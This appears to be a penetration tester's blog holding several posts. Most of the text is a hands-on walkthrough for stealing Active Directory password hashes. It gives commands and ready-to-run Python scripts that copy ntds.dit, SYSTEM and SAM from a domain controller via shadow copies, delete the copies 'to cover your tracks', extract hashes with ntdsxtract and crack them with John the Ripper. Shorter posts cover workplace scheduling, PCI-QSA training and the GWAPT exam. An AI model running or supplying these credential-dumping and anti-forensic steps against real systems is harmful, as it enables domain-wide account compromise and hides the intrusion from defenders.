Splitting my time between 2 bosses

So my move over to the PCI-QSA world has been extremely slow, primarily due to upper management. I am currently splitting my time between penetration testing and QSA work. It has not been an easy process working for two bosses who have different scheduling styles: one gives me my schedule months out, and the other will send me an email days before he expects me to start working on a project. This does not always work well, since the one boss does not usually check my calendar to see if I will be available. So I get scheduled to do a penetration test when I will be onsite at a customer doing PCI work. It rarely works out in my favor, and it makes for long hours with no compensation.
My boss's boss (our COO) said that on Jan 1, 2016 I will move over to the PCI group but will still need to assist the penetration testing group with some projects. I am not sure that is actually going to happen. The one thing that makes this a pain is that they already hired a person to fill my spot on the team, but another person left in November, leaving another shortage. The interesting thing is that this same issue I am having with moving groups is the same reason I left the company the first time I worked there.
Only time will tell if I actually get to do my new job or if I am stuck being split between bosses.

Getting Hashes From NTDS.dit File – Updated Version

Moved from my old WordPress Blog:

Decided to update my original post on getting hashes from the NTDS.dit file.

Once you have access to a domain controller, the first step is to copy the needed files from an existing Volume Shadow Copy or create a new one. I generally prefer to create a new copy so I know it has the latest information.
Get ntds.dit and SYSTEM from Volume Shadow Copy on Host
Luckily, Windows has built-in tools to assist with collecting the files needed.
Vssadmin tool
List Volume Shadow Copies on the system:
C:\>vssadmin list shadows
Example: 'vssadmin list shadows' with no shadows available:
C:\>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.

No items found that satisfy the query.
Create a new Volume Shadow Copy of the current drive:
C:\>vssadmin create shadow /for=C:
Example: 'vssadmin create shadow' creating a new copy:
C:\>vssadmin create shadow /for=c:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.

Successfully created shadow copy for 'c:'
Shadow Copy ID: {e8eb7931-5056-4f7d-a5d7-05c30da3e1b3}
Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

Pull files from the Volume Shadow copy: (EXAMPLES)
The path into the volume shadow copy looks similar to the line below:

\\?\GLOBALROOT\Device\<SHADOWCOPY DISK>\windows\<directory>\<File> <where to put file>

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .
[X] refers to the shadow copy number; in the example above the latest version is HarddiskVolumeShadowCopy1
(there could be multiple copies; use the last one listed)

Registry Save

I also recommend getting a current copy of SYSTEM from the registry just in case; I have had a couple of times where the SYSTEM file from the shadow copy was corrupt.
reg SAVE HKLM\SYSTEM c:\SYS
Delete the shadows to cover your tracks:
vssadmin delete shadows /for=<ForVolumeSpec> [/oldest | /all | /shadow=<ShadowID>] [/quiet]
EXAMPLE:
vssadmin delete shadows /for=C: /shadow=e8eb7931-5056-4f7d-a5d7-05c30da3e1b3
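Putting the host-side steps together, here is a rough Python sketch of the same workflow (create a shadow copy, pull the files, save the SYSTEM hive, and delete the shadow copy). This is just illustrative glue, not tooling from this walkthrough, and it assumes an elevated prompt on the domain controller and a Python interpreter being available there (in practice that usually means a packaged or portable build); adjust the output locations to taste.

# collect_ntds.py - rough sketch; run from an elevated prompt on the DC
import re
import subprocess

def run(cmd):
    # Run a command through cmd.exe and return its combined text output
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout + result.stderr

# 1. Create a fresh shadow copy of C: and pull the shadow volume name/ID from the output
out = run("vssadmin create shadow /for=C:")
volume = re.search(r"Shadow Copy Volume Name:\s*(\S+)", out).group(1)
shadow_id = re.search(r"Shadow Copy ID:\s*\{([0-9a-fA-F-]+)\}", out).group(1)

# 2. Copy the needed files out of the shadow copy (same paths as the copy examples above)
for path in (r"\windows\ntds\ntds.dit",
             r"\windows\system32\config\SYSTEM",
             r"\windows\system32\config\SAM"):
    print(run('copy "{0}{1}" .'.format(volume, path)))

# 3. Also save a current SYSTEM hive from the registry as a fallback
print(run(r"reg SAVE HKLM\SYSTEM .\SYS"))

# 4. Delete the shadow copy that was just created to cover your tracks
print(run("vssadmin delete shadows /for=C: /shadow={0} /quiet".format(shadow_id)))

Nothing in the sketch does anything the manual commands above do not; it just saves retyping them on each engagement.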
Now that you have the files, it is time to get the hashes
Utilities needed:
• libesedb
• ntdsxtract
libesedb
Download libesedb: (use whichever method you are comfortable with below)
Release Code:
https://github.com/libyal/libesedb/releases
(Download and unzip)
Compile Code:
https://github.com/libyal/libesedb
https://github.com/libyal/libesedb/wiki/Building
git clone https://github.com/libyal/libesedb.git
cd libesedb/
./configure
make
esedbexport usage:
Use esedbexport to export items stored in an Extensible Storage Engine (ESE)
Database (EDB) file
Usage: esedbexport [ -c codepage ] [ -l logfile ] [ -m mode ] [ -t target ]
[ -T table_name ] [ -hvV ] source

source: the source file

-c: codepage of ASCII strings, options: ascii, windows-874,
windows-932, windows-936, windows-1250, windows-1251,
windows-1252 (default), windows-1253, windows-1254
windows-1255, windows-1256, windows-1257 or windows-1258
-h: shows this help
-l: logs information about the exported items
-m: export mode, option: all, tables (default)
'all' exports all the tables or a single specified table with indexes,
'tables' exports all the tables or a single specified table
-t: specify the basename of the target directory to export to
(default is the source filename) esedbexport will add the suffix
.export to the basename
-T: exports only a specific table
-v: verbose output to stderr
-V: print version
Running esedbexport to extract ntds.dit data:
./esedbexport -t <Directory to export data to> <ntds.dit file>

.export will be added to the end of the directory listed above

EXAMPLE:
# ./esedbexport -t ~/ntds ~/ntds.dit
esedbexport 20150409

Opening file.
Exporting table 1 (MSysObjects) out of 11.
Exporting table 2 (MSysObjectsShadow) out of 11.
Exporting table 3 (MSysUnicodeFixupVer1) out of 11.
Exporting table 4 (datatable) out of 11.
Exporting table 5 (link_table) out of 11.
Exporting table 6 (hiddentable) out of 11.
Exporting table 7 (sdproptable) out of 11.
Exporting table 8 (sd_table) out of 11.
Exporting table 9 (quota_table) out of 11.
Exporting table 10 (quota_rebuild_progress_table) out of 11.
Exporting table 11 (MSysDefrag1) out of 11.
Export completed.
(Depending on the number of user accounts this can take some time to generate)
Extracted files:

# ls ~/ntds.export/
MSysObjects.0
MSysObjectsShadow.1
MSysUnicodeFixupVer1.2
datatable.3
link_table.4
hiddentable.5
sdproptable.6
sd_table.7
quota_table.8
quota_rebuild_progress_table.9
MSysDefrag1.10

NTDSXtract:
http://www.ntdsxtract.com/

CURRENT BUILD:
https://github.com/csababarta/ntdsxtract
git clone https://github.com/csababarta/ntdsxtract.git
Usage for dsusers.py
DSUsers v1.3.3
Extracts information related to user objects

usage: ./dsusers.py <datatable> <linktable> <work directory> [option]
datatable
The path to the file called datatable extracted by esedbexport
linktable
The path to the file called linktable extracted by esedbexport
work directory
The path to the directory where ntdsxtract should store its cache files and output files. If the directory does not exist it will be created.
options:
--sid <user sid>
List user identified by SID
--guid <user guid>
List user identified by GUID
--name <user name regexp>
List user identified by the regular expression
--active
List only active accounts
--locked
List only locked accounts
--syshive <path to system hive>
Required for password hash and history extraction
This option should be specified before the password hash
and password history extraction options!
--lmoutfile <name of the LM hash output file>
--ntoutfile <name of the NT hash output file>
--pwdformat <format of the hash output>
ophc - OphCrack format
When this format is specified the NT output file will be used
john - John The Ripper format
ocl - oclHashcat format
When this format is specified the NT output file will be used
--passwordhashes
Extract password hashes
--passwordhistory
Extract password history
--certificates
Extract certificates
--supplcreds
Extract supplemental credentials (e.g.: clear text passwords,
kerberos keys)
--membership
List groups of which the user is a member
--csvoutfile <name of the CSV output file>
The filename of the csv file to which ntdsxtract should write the
output
--debug <name of the CSV output file>
Turn on detailed error messages and stack trace
Extracting user info:
python dsusers.py <datatable> <linktable> <work directory> [option]
(datatable and linktable are from the previously extracted files)
--lmoutfile (output file for LM hashes)
--ntoutfile (output file for NTLM hashes)
--pwdformat john (output in JTR format)
--syshive (SYSTEM file from the system where the NTDS.dit was retrieved)
# python dsusers.py <DATATABLE FILE> <LINKTABLE FILE> <DIRECTORY TO WORK IN> --passwordhashes --lmoutfile <LM OUT FILE> --ntoutfile <NTLM OUT FILE> --pwdformat john --syshive <SYSTEM FILE>
(Add --passwordhistory to get previous hashes for each user; the number of hashes will vary based on the domain's password history settings)
Example Output in JTR Format:
# python dsusers.py ~/ntds.export/datatable.3 ~/ntds.export/link_table.4 ~/TEMP
--passwordhashes --lmoutfile LM.out --ntoutfile NT.out --pwdformat john --syshive ~/SYSTEM

[+] Started at: Wed, 22 Apr 2015 01:47:11 UTC
[+] Started with options:
[-] Extracting password hashes
[-] LM hash output filename: LM.out
[-] NT hash output filename: NT.out
[-] Hash output format: john
The directory (/root/TEMP) specified does not exists!
Would you like to create it? [Y/N] y
[+] Initialising engine...
[+] Loading saved map files (Stage 1)...
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/root/TEMP/offlid.map'
[+] Rebuilding maps...
[+] Scanning database - 100% -> 40933 records processed
[+] Sanity checks...
Schema record id: 1481
Schema type id: 10
[+] Extracting schema information - 100% -> 4142 records processed
[+] Loading saved map files (Stage 2)...
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/root/TEMP/links.map'
[+] Rebuilding maps...
[+] Extracting object links...
List of users:
==============
(This will scroll across the screen for a while depending on the number of accounts in the Domain)

Record ID: 32777
User name: FName LName
User principal name: email@address.net
SAM Account name: name
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 14a15a2a-887a-4444-a54a-aa6a4a689a00
SID: S-1-5-21-350701555-3721294507-2303513147-3801
When created: 2005-06-01 13:50:37
When changed: 2013-12-12 15:08:12
Account expires: Never
Password last set: 2013-10-07 13:20:19.146593
Last logon: 2013-12-11 18:35:10.166785
Last logon timestamp: 2013-12-12 15:08:12.281517
Bad password time 2013-12-11 00:04:52.446209
Logon count: 6239
Bad password count: 0
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$ local DOMAIN JOB Users FName LName
Password hashes:
name:$NT$2c8f14b95129b6eb77b1f69d04ff4000:::
name:e4c3436ddd1f625c6fede0fa5525f000:::
(Once this finishes you will have the new files with LM hashes and NTLM hashes in your working directory)
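If you end up doing this regularly, the offline side can be chained together as well. The sketch below is my own rough wrapper idea (not part of libesedb or ntdsxtract) that runs esedbexport and dsusers.py with the same options used above; the esedbexport path, ntdsxtract location, work directory, and output filenames are all assumptions to adjust for your setup, and 'python' needs to point at an interpreter ntdsxtract is happy with (it is a Python 2 era tool).

# extract_hashes.py - rough sketch; the paths below are assumptions for this example
import glob
import os
import subprocess

NTDS = "ntds.dit"     # ntds.dit copied from the DC
SYSTEM = "SYSTEM"     # SYSTEM hive copied alongside it
EXPORT = "ntds"       # esedbexport appends .export to this basename

# 1. Dump the ESE tables out of ntds.dit (creates ntds.export/)
subprocess.run(["./libesedb/esedbtools/esedbexport", "-t", EXPORT, NTDS], check=True)

# 2. Locate the datatable.N and link_table.N files that were exported
datatable = glob.glob(EXPORT + ".export/datatable.*")[0]
linktable = glob.glob(EXPORT + ".export/link_table.*")[0]

# 3. Pre-create the work directory so dsusers.py does not stop and prompt for it
os.makedirs("work", exist_ok=True)

# 4. Extract the hashes in John format, using the same options as the command above
subprocess.run(["python", "./ntdsxtract/dsusers.py", datatable, linktable, "work",
                "--passwordhashes", "--pwdformat", "john",
                "--lmoutfile", "LM.out", "--ntoutfile", "NT.out",
                "--syshive", SYSTEM], check=True)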
Now that you have what you need… it is time to start cracking passwords to get to that data you wanted…
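As a starting point for the cracking, something along these lines works against the John-format NT output file; it assumes a John the Ripper jumbo build on the PATH and a wordlist at the location shown (both are assumptions, swap in whatever you normally use).

# crack_nt.py - rough sketch; assumes a John the Ripper jumbo build and a wordlist
import subprocess

WORDLIST = "/usr/share/wordlists/rockyou.txt"   # assumed wordlist location

# Wordlist attack against the NT hashes extracted by dsusers.py
subprocess.run(["john", "--format=NT", "--wordlist=" + WORDLIST, "NT.out"], check=True)

# Show whatever has been cracked so far
subprocess.run(["john", "--show", "--format=NT", "NT.out"], check=True)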

PCI-QSA Training

I spent the past 2 days in Boston in the PCI-QSA training class. We took the exam during the last hour and a half of the class, but will not know the results for a week or two. The class was interesting, and I learned a bit from the instructor's perspective on doing assessments. I met several interesting people from all over the world, working for different companies. I thought it was very interesting talking to the people working for the accounting firms about how they were using the QSA certification with their clients. Most of them were just doing gap analyses and not actually signing ROCs for clients.
Well, hope to hear if I passed…

Passed the GWAPT cert

I took the SANS GIAC Web Application Penetration Tester (GWAPT) class back in December of 2014 in Washington DC with Eric Conrad. I procrastinated for several months before I finally had to break down and take the certification exam before my time expired in late April 2015.
I spent a few days going over the books to refresh myself on the content we covered, then took one of the practice exams and actually did not do too well on it. Having never taken a SANS cert before, I was not sure what to expect, and I probably should have allowed the full 2 hours to sit the practice test. I rushed through it, guessed on a lot of the questions, and did not remember going over half of the info. (Note to self: actually read the questions and each answer, and not just say "that looks good.") Overall I was a little frustrated after the first practice exam, since I have been doing this for about 3 years now, and many of the questions seemed to be based on opinion and not actual facts. Several of the questions had more to do with general penetration testing than actual web application testing, like needing to know the TTL from a DNS request for a domain name.
So I read the books for a few more days before taking the second practice test, which I did much better on since I had some idea of what to expect. I did rush through it again, finishing the entire test in 48 minutes, which is really not that great, but I just wanted to make sure I had some idea of what the real test would be like. Two days later I sat for the actual GWAPT test and planned to take my time and read every question thoroughly.
I sat for the exam on April 9, 2015. I finished the test and passed it fairly easily, but was somewhat perplexed that it had nothing similar to the practice tests. It seemed the practice exams had nothing to do with the actual exam. Many of the questions were on topics that were in the books but never brought up in the practice tests, which frustrated me a little, since I had to spend a little more time looking for some of the answers that I had not really gone over previously.
So for anyone planning on sitting the exam who has not taken a SANS cert before: plan accordingly and make sure you know all of the content in the books. Do not expect that the practice exams will actually prepare you for the real test; they might actually make you study information that is never asked on the exam.